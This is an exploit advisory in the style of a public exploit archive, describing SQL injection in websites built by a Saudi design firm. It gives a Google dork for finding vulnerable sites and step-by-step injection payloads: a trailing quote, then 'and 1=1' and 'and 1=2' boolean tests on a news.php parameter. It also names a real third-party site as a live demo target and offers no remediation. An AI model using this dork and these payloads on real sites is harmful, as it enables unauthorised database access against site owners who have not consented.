[+] Title: dreams SQL Injection
[+] Author: h4shur
[+] date:2020-05-04
[+] Vendor Homepage: dreams.com.sa
[+] Software Link: dreams.com.sa
[+] Tested on: Windows 10 & Google Chrome
[+] Category : Web Application Bugs
[+} Dork : intext:"برمجة وتصميم مجموعة الاحلام ديزاين"
### Note:
[+] Add the quotation mark (') to the end of the link :
* Target.com/news.php?newsId=4'
[+] First add "and 1 = 1" and then "and 1 = 2" to the end of the link :
* Target.com/news.php?newsId=4 and 1=1
* Target.com/news.php?newsId=4 and 1=2
### Demo:
[+] http://www.ssss.org.sa/gallery.php?id=48
### Contact Me :
* Telegram : @h4shur
* Email : h4shursec@gmail.com
* Instagram : @netedit0r
* twitter : @h4shur
#Just_Iran